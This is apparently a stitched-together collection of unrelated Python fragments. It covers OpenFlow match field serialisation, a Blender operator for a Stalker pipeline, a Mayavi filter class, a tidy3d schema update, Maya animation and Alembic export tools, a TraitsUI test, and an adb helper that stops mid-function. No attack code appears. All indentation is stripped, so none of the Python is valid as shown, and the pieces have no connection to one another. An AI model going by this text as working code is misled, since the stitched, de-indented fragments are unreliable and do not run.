if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PORT):
self.append_field(ofproto.OXM_OF_IN_PORT, self._flow.in_port)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PHY_PORT):
self.append_field(ofproto.OXM_OF_IN_PHY_PORT, self._flow.in_phy_port)
if self._wc.ft_test(ofproto.OFPXMT_OFB_METADATA):
if (self._wc.metadata_mask == UINT64_MAX):
header = ofproto.OXM_OF_METADATA
else:
header = ofproto.OXM_OF_METADATA_W
self.append_field(header, self._flow.metadata, self._wc.metadata_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_DST):
if self._wc.dl_dst_mask:
header = ofproto.OXM_OF_ETH_DST_W
else:
header = ofproto.OXM_OF_ETH_DST
self.append_field(header, self._flow.dl_dst, self._wc.dl_dst_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_SRC):
if self._wc.dl_src_mask:
header = ofproto.OXM_OF_ETH_SRC_W
else:
header = ofproto.OXM_OF_ETH_SRC
self.append_field(header, self._flow.dl_src, self._wc.dl_src_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_TYPE):
self.append_field(ofproto.OXM_OF_ETH_TYPE, self._flow.dl_type)
if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_VID):
if (self._wc.vlan_vid_mask == UINT16_MAX):
header = ofproto.OXM_OF_VLAN_VID
else:
header = ofproto.OXM_OF_VLAN_VID_W
self.append_field(header, self._flow.vlan_vid, self._wc.vlan_vid_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_PCP):
self.append_field(ofproto.OXM_OF_VLAN_PCP, self._flow.vlan_pcp)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_DSCP):
self.append_field(ofproto.OXM_OF_IP_DSCP, self._flow.ip_dscp)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_ECN):
self.append_field(ofproto.OXM_OF_IP_ECN, self._flow.ip_ecn)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_PROTO):
self.append_field(ofproto.OXM_OF_IP_PROTO, self._flow.ip_proto)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_SRC):
if (self._wc.ipv4_src_mask == UINT32_MAX):
header = ofproto.OXM_OF_IPV4_SRC
else:
header = ofproto.OXM_OF_IPV4_SRC_W
self.append_field(header, self._flow.ipv4_src, self._wc.ipv4_src_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_DST):
if (self._wc.ipv4_dst_mask == UINT32_MAX):
header = ofproto.OXM_OF_IPV4_DST
else:
header = ofproto.OXM_OF_IPV4_DST_W
self.append_field(header, self._flow.ipv4_dst, self._wc.ipv4_dst_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_SRC):
self.append_field(ofproto.OXM_OF_TCP_SRC, self._flow.tcp_src)
if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_DST):
self.append_field(ofproto.OXM_OF_TCP_DST, self._flow.tcp_dst)
if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_SRC):
self.append_field(ofproto.OXM_OF_UDP_SRC, self._flow.udp_src)
if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_DST):
self.append_field(ofproto.OXM_OF_UDP_DST, self._flow.udp_dst)
if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_SRC):
self.append_field(ofproto.OXM_OF_SCTP_SRC, self._flow.sctp_src)
if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_DST):
self.append_field(ofproto.OXM_OF_SCTP_DST, self._flow.sctp_dst)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_TYPE):
self.append_field(ofproto.OXM_OF_ICMPV4_TYPE, self._flow.icmpv4_type)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_CODE):
self.append_field(ofproto.OXM_OF_ICMPV4_CODE, self._flow.icmpv4_code)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_OP):
self.append_field(ofproto.OXM_OF_ARP_OP, self._flow.arp_op)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SPA):
if (self._wc.arp_spa_mask == UINT32_MAX):
header = ofproto.OXM_OF_ARP_SPA
else:
header = ofproto.OXM_OF_ARP_SPA_W
self.append_field(header, self._flow.arp_spa, self._wc.arp_spa_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_TPA):
if (self._wc.arp_tpa_mask == UINT32_MAX):
header = ofproto.OXM_OF_ARP_TPA
else:
header = ofproto.OXM_OF_ARP_TPA_W
self.append_field(header, self._flow.arp_tpa, self._wc.arp_tpa_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SHA):
if self._wc.arp_sha_mask:
header = ofproto.OXM_OF_ARP_SHA_W
else:
header = ofproto.OXM_OF_ARP_SHA
self.append_field(header, self._flow.arp_sha, self._wc.arp_sha_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_THA):
if self._wc.arp_tha_mask:
header = ofproto.OXM_OF_ARP_THA_W
else:
header = ofproto.OXM_OF_ARP_THA
self.append_field(header, self._flow.arp_tha, self._wc.arp_tha_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_SRC):
if len(self._wc.ipv6_src_mask):
header = ofproto.OXM_OF_IPV6_SRC_W
else:
header = ofproto.OXM_OF_IPV6_SRC
self.append_field(header, self._flow.ipv6_src, self._wc.ipv6_src_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_DST):
if len(self._wc.ipv6_dst_mask):
header = ofproto.OXM_OF_IPV6_DST_W
else:
header = ofproto.OXM_OF_IPV6_DST
self.append_field(header, self._flow.ipv6_dst, self._wc.ipv6_dst_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_FLABEL):
if (self._wc.ipv6_flabel_mask == UINT32_MAX):
header = ofproto.OXM_OF_IPV6_FLABEL
else:
header = ofproto.OXM_OF_IPV6_FLABEL_W
self.append_field(header, self._flow.ipv6_flabel, self._wc.ipv6_flabel_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_TYPE):
self.append_field(ofproto.OXM_OF_ICMPV6_TYPE, self._flow.icmpv6_type)
if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_CODE):
self.append_field(ofproto.OXM_OF_ICMPV6_CODE, self._flow.icmpv6_code)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TARGET):
self.append_field(ofproto.OXM_OF_IPV6_ND_TARGET, self._flow.ipv6_nd_target)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_SLL):
self.append_field(ofproto.OXM_OF_IPV6_ND_SLL, self._flow.ipv6_nd_sll)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TLL):
self.append_field(ofproto.OXM_OF_IPV6_ND_TLL, self._flow.ipv6_nd_tll)
if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_LABEL):
self.append_field(ofproto.OXM_OF_MPLS_LABEL, self._flow.mpls_label)
if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_TC):
self.append_field(ofproto.OXM_OF_MPLS_TC, self._flow.mpls_tc)
if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_BOS):
self.append_field(ofproto.OXM_OF_MPLS_BOS, self._flow.mpls_bos)
if self._wc.ft_test(ofproto.OFPXMT_OFB_PBB_ISID):
if self._wc.pbb_isid_mask:
header = ofproto.OXM_OF_PBB_ISID_W
else:
header = ofproto.OXM_OF_PBB_ISID
self.append_field(header, self._flow.pbb_isid, self._wc.pbb_isid_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_TUNNEL_ID):
if self._wc.tunnel_id_mask:
header = ofproto.OXM_OF_TUNNEL_ID_W
else:
header = ofproto.OXM_OF_TUNNEL_ID
self.append_field(header, self._flow.tunnel_id, self._wc.tunnel_id_mask)
if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_EXTHDR):
if self._wc.ipv6_exthdr_mask:
header = ofproto.OXM_OF_IPV6_EXTHDR_W
else:
header = ofproto.OXM_OF_IPV6_EXTHDR
self.append_field(header, self._flow.ipv6_exthdr, self._wc.ipv6_exthdr_mask)
field_offset = (offset + 4)
for f in self.fields:
f.serialize(buf, field_offset)
field_offset += f.length
length = (field_offset - offset)
msg_pack_into('!HH', buf, offset, ofproto.OFPMT_OXM, length)
pad_len = (utils.round_up(length, 8) - length)
msg_pack_into(('%dx' % pad_len), buf, field_offset)
return (length + pad_len)
def parser(cls, buf, offset):
match = OFPMatch()
(type_, length) = struct.unpack_from('!HH', buf, offset)
match.type = type_
match.length = length
offset += 4
length -= 4
exc = None
residue = None
try:
cls.parser_old(match, buf, offset, length)
except struct.error as e:
exc = e
fields = []
try:
while (length > 0):
(n, value, mask, field_len) = ofproto.oxm_parse(buf, offset)
(k, uv) = ofproto.oxm_to_user(n, value, mask)
fields.append((k, uv))
offset += field_len
length -= field_len
except struct.error as e:
exc = e
residue = buf[offset:]
match._fields2 = fields
if (exc is not None):
raise exception.OFPTruncatedMessage(match, residue, exc)
return match
def parser_old(match, buf, offset, length):
while (length > 0):
field = OFPMatchField.parser(buf, offset)
offset += field.length
length -= field.length
match.fields.append(field)
def set_in_port(self, port):
self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PORT)
self._flow.in_port = port
def set_in_phy_port(self, phy_port):
self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PHY_PORT)
self._flow.in_phy_port = phy_port
def set_metadata(self, metadata):
self.set_metadata_masked(metadata, UINT64_MAX)
def set_metadata_masked(self, metadata, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_METADATA)
self._wc.metadata_mask = mask
self._flow.metadata = (metadata & mask)
def set_dl_dst(self, dl_dst):
self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST)
self._flow.dl_dst = dl_dst
def set_dl_dst_masked(self, dl_dst, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST)
self._wc.dl_dst_mask = mask
self._flow.dl_dst = mac.haddr_bitand(dl_dst, mask)
def set_dl_src(self, dl_src):
self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC)
self._flow.dl_src = dl_src
def set_dl_src_masked(self, dl_src, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC)
self._wc.dl_src_mask = mask
self._flow.dl_src = mac.haddr_bitand(dl_src, mask)
def set_dl_type(self, dl_type):
self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_TYPE)
self._flow.dl_type = dl_type
def set_vlan_vid_none(self):
self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID)
self._wc.vlan_vid_mask = UINT16_MAX
self._flow.vlan_vid = ofproto.OFPVID_NONE
def set_vlan_vid(self, vid):
self.set_vlan_vid_masked(vid, UINT16_MAX)
def set_vlan_vid_masked(self, vid, mask):
vid |= ofproto.OFPVID_PRESENT
self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID)
self._wc.vlan_vid_mask = mask
self._flow.vlan_vid = vid
def set_vlan_pcp(self, pcp):
self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_PCP)
self._flow.vlan_pcp = pcp
def set_ip_dscp(self, ip_dscp):
self._wc.ft_set(ofproto.OFPXMT_OFB_IP_DSCP)
self._flow.ip_dscp = ip_dscp
def set_ip_ecn(self, ip_ecn):
self._wc.ft_set(ofproto.OFPXMT_OFB_IP_ECN)
self._flow.ip_ecn = ip_ecn
def set_ip_proto(self, ip_proto):
self._wc.ft_set(ofproto.OFPXMT_OFB_IP_PROTO)
self._flow.ip_proto = ip_proto
def set_ipv4_src(self, ipv4_src):
self.set_ipv4_src_masked(ipv4_src, UINT32_MAX)
def set_ipv4_src_masked(self, ipv4_src, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_SRC)
self._flow.ipv4_src = ipv4_src
self._wc.ipv4_src_mask = mask
def set_ipv4_dst(self, ipv4_dst):
self.set_ipv4_dst_masked(ipv4_dst, UINT32_MAX)
def set_ipv4_dst_masked(self, ipv4_dst, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_DST)
self._flow.ipv4_dst = ipv4_dst
self._wc.ipv4_dst_mask = mask
def set_tcp_src(self, tcp_src):
self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_SRC)
self._flow.tcp_src = tcp_src
def set_tcp_dst(self, tcp_dst):
self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_DST)
self._flow.tcp_dst = tcp_dst
def set_udp_src(self, udp_src):
self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_SRC)
self._flow.udp_src = udp_src
def set_udp_dst(self, udp_dst):
self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_DST)
self._flow.udp_dst = udp_dst
def set_sctp_src(self, sctp_src):
self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_SRC)
self._flow.sctp_src = sctp_src
def set_sctp_dst(self, sctp_dst):
self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_DST)
self._flow.sctp_dst = sctp_dst
def set_icmpv4_type(self, icmpv4_type):
self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_TYPE)
self._flow.icmpv4_type = icmpv4_type
def set_icmpv4_code(self, icmpv4_code):
self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_CODE)
self._flow.icmpv4_code = icmpv4_code
def set_arp_opcode(self, arp_op):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_OP)
self._flow.arp_op = arp_op
def set_arp_spa(self, arp_spa):
self.set_arp_spa_masked(arp_spa, UINT32_MAX)
def set_arp_spa_masked(self, arp_spa, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SPA)
self._wc.arp_spa_mask = mask
self._flow.arp_spa = arp_spa
def set_arp_tpa(self, arp_tpa):
self.set_arp_tpa_masked(arp_tpa, UINT32_MAX)
def set_arp_tpa_masked(self, arp_tpa, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_TPA)
self._wc.arp_tpa_mask = mask
self._flow.arp_tpa = arp_tpa
def set_arp_sha(self, arp_sha):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA)
self._flow.arp_sha = arp_sha
def set_arp_sha_masked(self, arp_sha, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA)
self._wc.arp_sha_mask = mask
self._flow.arp_sha = mac.haddr_bitand(arp_sha, mask)
def set_arp_tha(self, arp_tha):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA)
self._flow.arp_tha = arp_tha
def set_arp_tha_masked(self, arp_tha, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA)
self._wc.arp_tha_mask = mask
self._flow.arp_tha = mac.haddr_bitand(arp_tha, mask)
def set_ipv6_src(self, src):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC)
self._flow.ipv6_src = src
def set_ipv6_src_masked(self, src, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC)
self._wc.ipv6_src_mask = mask
self._flow.ipv6_src = [(x & y) for (x, y) in zip(src, mask)]
def set_ipv6_dst(self, dst):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST)
self._flow.ipv6_dst = dst
def set_ipv6_dst_masked(self, dst, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST)
self._wc.ipv6_dst_mask = mask
self._flow.ipv6_dst = [(x & y) for (x, y) in zip(dst, mask)]
def set_ipv6_flabel(self, flabel):
self.set_ipv6_flabel_masked(flabel, UINT32_MAX)
def set_ipv6_flabel_masked(self, flabel, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_FLABEL)
self._wc.ipv6_flabel_mask = mask
self._flow.ipv6_flabel = flabel
def set_icmpv6_type(self, icmpv6_type):
self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_TYPE)
self._flow.icmpv6_type = icmpv6_type
def set_icmpv6_code(self, icmpv6_code):
self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_CODE)
self._flow.icmpv6_code = icmpv6_code
def set_ipv6_nd_target(self, target):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TARGET)
self._flow.ipv6_nd_target = target
def set_ipv6_nd_sll(self, ipv6_nd_sll):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_SLL)
self._flow.ipv6_nd_sll = ipv6_nd_sll
def set_ipv6_nd_tll(self, ipv6_nd_tll):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TLL)
self._flow.ipv6_nd_tll = ipv6_nd_tll
def set_mpls_label(self, mpls_label):
self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_LABEL)
self._flow.mpls_label = mpls_label
def set_mpls_tc(self, mpls_tc):
self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_TC)
self._flow.mpls_tc = mpls_tc
def set_mpls_bos(self, bos):
self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_BOS)
self._flow.mpls_bos = bos
def set_pbb_isid(self, isid):
self._wc.ft_set(ofproto.OFPXMT_OFB_PBB_ISID)
self._flow.pbb_isid = isid
def set_pbb_isid_masked(self, isid, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_PBB_ISID)
self._wc.pbb_isid_mask = mask
self._flow.pbb_isid = isid
def set_tunnel_id(self, tunnel_id):
self._wc.ft_set(ofproto.OFPXMT_OFB_TUNNEL_ID)
self._flow.tunnel_id = tunnel_id
def set_tunnel_id_masked(self, tunnel_id, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_TUNNEL_ID)
self._wc.tunnel_id_mask = mask
self._flow.tunnel_id = tunnel_id
def set_ipv6_exthdr(self, hdr):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_EXTHDR)
self._flow.ipv6_exthdr = hdr
def set_ipv6_exthdr_masked(self, hdr, mask):
self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_EXTHDR)
self._wc.ipv6_exthdr_mask = mask
self._flow.ipv6_exthdr = hdr |
class StalkerSceneAddAllShotOutputsOperator(bpy.types.Operator):
bl_label = 'Add All Shot Outputs'
bl_idname = 'stalker.scene_add_all_shot_outputs_op'
stalker_entity_id = bpy.props.IntProperty(name='stalker_entity_id')
stalker_entity_name = bpy.props.StringProperty(name='stalker_entity_name')
def execute(self, context):
logger.debug(('inside %s.execute()' % self.__class__.__name__))
scene = Task.query.get(self.stalker_entity_id)
logger.debug(('scene: %s' % scene))
return set(['FINISHED']) |
class FilterBase(Filter):
__version__ = 0
filter = Instance(tvtk.Object, allow_none=False, record=True)
view = View(Group(Item(name='filter', style='custom', resizable=True, show_label=False), springy=True), scrollable=True, resizable=True)
def setup_pipeline(self):
f = self.filter
if (f is not None):
f.on_trait_change(self.update_data)
def update_pipeline(self):
inputs = self.inputs
fil = self.filter
if ((len(inputs) == 0) or (fil is None)):
return
self.configure_connection(fil, inputs[0])
fil.update()
self._set_outputs([fil])
def update_data(self):
if ((len(self.inputs) == 0) or (not self.running)):
return
self.filter.update()
self.data_changed = True
def _filter_changed(self, old, new):
if (old is not None):
old.on_trait_change(self.update_data, remove=True)
new.on_trait_change(self.update_data)
if (old is not None):
self.update_pipeline() |
_from_version('1.8')
def update_1_8(sim_dict: dict) -> dict:
def fix_missing_scalar_field(mnt_dict: dict) -> dict:
for (key, val) in mnt_dict['field_dataset'].items():
if (isinstance(val, str) and (val == 'XR.DATAARRAY')):
mnt_dict['field_dataset'][key] = 'ScalarFieldDataArray'
return mnt_dict
iterate_update_dict(update_dict=sim_dict, update_types={'CustomFieldSource': fix_missing_scalar_field})
return sim_dict |
class Animation(object):
def equalize_node_speed(cls):
start_frame = int(pm.playbackOptions(q=1, min=1))
end_frame = int(pm.playbackOptions(q=1, max=1))
selected_node = pm.selected()[0]
node = pm.duplicate(selected_node, un=1, rr=1)[0]
node.rename(('%s_Equalized#' % selected_node.name()))
if (not node.hasAttr('speed')):
node.addAttr('speed', at='double')
pm.currentTime(start_frame)
pm.setKeyframe(node.speed)
prev_pos = node.t.get()
pos_data = []
rot_data = []
for i in range(start_frame, (end_frame + 1)):
pm.currentTime(i)
current_pos = node.t.get()
pos_data.append(current_pos)
rot_data.append(node.r.get())
speed = (current_pos - prev_pos).length()
prev_pos = current_pos
node.speed.set(speed)
pm.setKeyframe(node.speed)
camera_path = pm.curve(d=3, p=pos_data)
camera_path_curve = camera_path.getShape()
pm.rebuildCurve(camera_path_curve, ch=1, rpo=1, rt=0, end=1, kr=0, kcp=0, kep=1, kt=0, s=((end_frame - start_frame) + 1), d=3, tol=0.01)
curve_cv_positions = camera_path_curve.getCVs()
curve_cv_positions.pop(1)
curve_cv_positions.pop((- 2))
prev_pos = curve_cv_positions[0]
for (i, j) in enumerate(range(start_frame, end_frame)):
pm.currentTime(j)
current_pos = curve_cv_positions[i]
node.t.set(curve_cv_positions[i])
node.speed.set((current_pos - prev_pos).length())
pm.setKeyframe(node.speed)
prev_pos = current_pos
def bake_all_constraints(cls):
command = 'bakeResults -simulation true -t "{start}:{end}" -sampleBy 1 -oversamplingRate 1 -disableImplicitControl true -preserveOutsideKeys true -sparseAnimCurveBake false -removeBakedAttributeFromLayer false -removeBakedAnimFromLayer false -bakeOnOverrideLayer false -minimizeRotation true -at "tx" -at "ty" -at "tz" -at "rx" -at "ry" -at "rz" {objects};'
start_frame = int(pm.playbackOptions(q=1, min=1))
end_frame = int(pm.playbackOptions(q=1, max=1))
all_transforms = []
for node in pm.ls(type='constraint'):
all_transforms += node.outputs(type='transform')
object_names = ' '.join([node.longName() for node in all_transforms])
bake_command = command.format(start=start_frame, end=end_frame, objects=object_names)
pm.mel.eval(bake_command)
def bake_alembic_animations(cls):
command = 'bakeResults -simulation true -t "{start}:{end}" -sampleBy 1 -oversamplingRate 1 -disableImplicitControl true -preserveOutsideKeys true -sparseAnimCurveBake false -removeBakedAttributeFromLayer false -removeBakedAnimFromLayer false -bakeOnOverrideLayer false -minimizeRotation true -at "tx" -at "ty" -at "tz" -at "rx" -at "ry" -at "rz" {objects};'
start_frame = int(pm.playbackOptions(q=1, min=1))
end_frame = int(pm.playbackOptions(q=1, max=1))
all_transforms = []
for node in pm.ls(type='AlembicNode'):
all_transforms += node.outputs(type='transform')
object_names = ' '.join([node.longName() for node in all_transforms])
bake_command = command.format(start=start_frame, end=end_frame, objects=object_names)
pm.mel.eval(bake_command)
def delete_base_anim_layer(cls):
base_layer = pm.PyNode('BaseAnimation')
base_layer.unlock()
pm.delete(base_layer)
def smooth_component_animation(cls, ui_item):
frame_range = pm.textFieldButtonGrp(ui_item, q=1, tx=1)
pm.mel.eval(('oySmoothComponentAnimation(%s)' % frame_range))
def smooth_selected_keyframes(cls, iteration=10):
from anima.utils import smooth_array
node = pm.keyframe(q=1, sl=1, n=1)[0]
keyframe_indices = pm.keyframe(q=1, sl=1, iv=1)
keyframe_values = pm.keyframe(q=1, sl=1, vc=1)
for i in range(iteration):
keyframe_values = smooth_array(keyframe_values)
for (i, v) in zip(keyframe_indices, keyframe_values):
pm.keyframe(node, e=1, index=i, vc=v)
def cam_2_chan(cls, startButton, endButton):
start = int(pm.textField(startButton, q=True, tx=True))
end = int(pm.textField(endButton, q=True, tx=True))
cam_to_chan(start, end)
def create_alembic_command(cls):
from_top_node = pm.checkBox('from_top_node_checkBox', q=1, v=1)
cls.create_alembic(from_top_node)
def create_alembic(cls, from_top_node=1):
import os
root_flag = '-root %(node)s'
mel_command = 'AbcExport -j "-frameRange %(start)s %(end)s -ro -stripNamespaces -uvWrite -wholeFrameGeo -worldSpace %(roots)s -file %(path)s";'
current_path = pm.workspace.path
abc_path = os.path.join(current_path, 'cache', 'alembic')
try:
os.makedirs(abc_path)
except OSError:
pass
abc_full_path = pm.fileDialog2(startingDirectory=abc_path)
def find_top_parent(node):
parents = node.listRelatives(p=1)
parent = None
while parents:
parent = parents[0]
parents = parent.listRelatives(p=1)
if parents:
parent = parents[0]
else:
return parent
if (not parent):
return node
else:
return parent
if abc_full_path:
abc_full_path = abc_full_path[0]
abc_full_path = (os.path.splitext(abc_full_path)[0] + '.abc')
selection = pm.ls(sl=1)
nodes = []
for node in selection:
if from_top_node:
node = find_top_parent(node)
if (node not in nodes):
nodes.append(node)
roots = []
for node in nodes:
roots.append((root_flag % {'node': node.fullPath()}))
roots_as_string = ' '.join(roots)
start = int(pm.playbackOptions(q=1, minTime=1))
end = int(pm.playbackOptions(q=1, maxTime=1))
rendered_mel_command = (mel_command % {'start': start, 'end': end, 'roots': roots_as_string, 'path': abc_full_path})
pm.mel.eval(rendered_mel_command)
def copy_alembic_data(cls, source=None, target=None):
selection = pm.ls(sl=1)
if ((not source) or (not target)):
source = selection[0]
target = selection[1]
source_nodes = source.listRelatives(ad=1, type=(pm.nt.Mesh, pm.nt.NurbsSurface))
target_nodes = target.listRelatives(ad=1, type=(pm.nt.Mesh, pm.nt.NurbsSurface))
source_node_names = []
target_node_names = []
for node in source_nodes:
name = node.name().split(':')[(- 1)].split('|')[(- 1)]
source_node_names.append(name)
for node in target_nodes:
name = node.name().split(':')[(- 1)].split('|')[(- 1)]
target_node_names.append(name)
lut = []
for (i, target_node) in enumerate(target_nodes):
target_node_name = target_node_names[i]
try:
index = source_node_names.index(target_node_name)
except ValueError:
pass
else:
lut.append((source_nodes[index], target_nodes[i]))
for (source_node, target_node) in lut:
if isinstance(source_node, pm.nt.Mesh):
in_attr_name = 'inMesh'
out_attr_name = 'outMesh'
else:
in_attr_name = 'create'
out_attr_name = 'worldSpace'
conns = source_node.attr(in_attr_name).inputs(p=1)
if conns:
for conn in conns:
if isinstance(conn.node(), pm.nt.AlembicNode):
(conn >> target_node.attr(in_attr_name))
break
else:
(source_node.attr(out_attr_name) >> target_node.attr(in_attr_name))
def bake_component_animation_to_locator(cls):
start = int(pm.playbackOptions(q=1, minTime=1))
end = int(pm.playbackOptions(q=1, maxTime=1))
vertices = pm.ls(sl=1, fl=1)
locator = pm.spaceLocator()
ftreduce = functools.reduce
for i in range(start, (end + 1)):
pm.currentTime(i)
point_positions = pm.xform(vertices, q=1, ws=1, t=1)
point_count = (len(point_positions) / 3)
px = (ftreduce((lambda x, y: (x + y)), point_positions[0::3]) / point_count)
py = (ftreduce((lambda x, y: (x + y)), point_positions[1::3]) / point_count)
pz = (ftreduce((lambda x, y: (x + y)), point_positions[2::3]) / point_count)
locator.t.set(px, py, pz)
pm.setKeyframe(locator.tx)
pm.setKeyframe(locator.ty)
pm.setKeyframe(locator.tz)
pm.currentTime(start)
def bake_locator_animation_to_component(cls, vertices=None, locators=None, start=None, end=None):
if (not start):
start = int(pm.playbackOptions(q=1, minTime=1))
if (not end):
end = int(pm.playbackOptions(q=1, maxTime=1))
if ((not vertices) or (not locators)):
selection = pm.ls(sl=1, fl=1)
locators = list(filter((lambda x: isinstance(x, pm.nt.Transform)), selection))
vertices = list(filter((lambda x: isinstance(x, pm.MeshVertex)), selection))
if (not isinstance(vertices, list)):
vertices = [vertices]
if (not isinstance(locators, list)):
locators = [locators]
for i in range(start, (end + 1)):
pm.currentTime(i)
for (vertex, locator) in zip(vertices, locators):
pos = pm.xform(locator, q=1, ws=1, t=1)
pm.xform(vertex, ws=1, t=pos)
pm.setKeyframe(vertex)
pm.currentTime(start)
def attach_follicle(cls):
pnts = pm.ls(sl=1)
for pnt in pnts:
mesh = pnt.node()
follicle = pm.createNode('follicle')
(mesh.worldMesh[0] >> follicle.inputMesh)
uv = pnts[0].getUV()
follicle.parameterU.set(uv[0])
follicle.parameterV.set(uv[1])
follicle_t = follicle.getParent()
(follicle.outTranslate >> follicle_t.t)
(follicle.outRotate >> follicle_t.r)
def set_range_from_shot(cls):
shots = pm.ls(type='shot')
min_frame = None
max_frame = None
if shots:
shot = shots[0]
min_frame = shot.getAttr('startFrame')
max_frame = shot.getAttr('endFrame')
else:
from anima.dcc import mayaEnv
m = mayaEnv.Maya()
v = m.get_current_version()
if v:
t = v.task
from stalker import Shot
parents = t.parents
parents.reverse()
for p in parents:
if isinstance(p, Shot):
pm.warning('No shot node in the scene, using the Shot task!!!')
min_frame = p.cut_in
max_frame = p.cut_out
break
if ((min_frame is not None) and (max_frame is not None)):
pm.playbackOptions(ast=min_frame, aet=max_frame, min=min_frame, max=max_frame)
else:
pm.error('No shot node in the scene, nor the task is related to a Shot!')
def export_alembics_on_farm(cls):
from anima.dcc.mayaEnv import Maya, afanasy_publisher
m = Maya()
v = m.get_current_version()
if v:
afanasy_publisher.submit_alembic_job(v.absolute_full_path, project_code=v.task.project.code)
else:
raise RuntimeError('This scene is not a Stalker version!')
def playblast_on_farm(cls):
from anima.dcc.mayaEnv import Maya, afanasy_publisher
m = Maya()
v = m.get_current_version()
if v:
afanasy_publisher.submit_playblast_job(v.absolute_full_path, project_code=v.task.project.code)
else:
raise RuntimeError('This scene is not a Stalker version!') |
class TestButtonEditorSimpleDemo(unittest.TestCase):
def test_button_editor_simple_demo(self):
demo = runpy.run_path(DEMO_PATH)['demo']
tester = UITester()
with tester.create_ui(demo) as ui:
button = tester.find_by_name(ui, 'my_button_trait')
for index in range(5):
button.perform(MouseClick())
self.assertEqual(demo.click_counter, (index + 1))
click_counter = tester.find_by_name(ui, 'click_counter')
displayed_count = click_counter.inspect(DisplayedText())
self.assertEqual(displayed_count, '5')
demo.click_counter = 10
displayed_count = click_counter.inspect(DisplayedText())
self.assertEqual(displayed_count, '10') |
def run_adb_command(command: str) -> bool:
command = f'adb {command}'
if (not is_adb_installed()):
raise ADBException(ADBExceptionTypes.ADB_NOT_INSTALLED)
try:
adb_root()
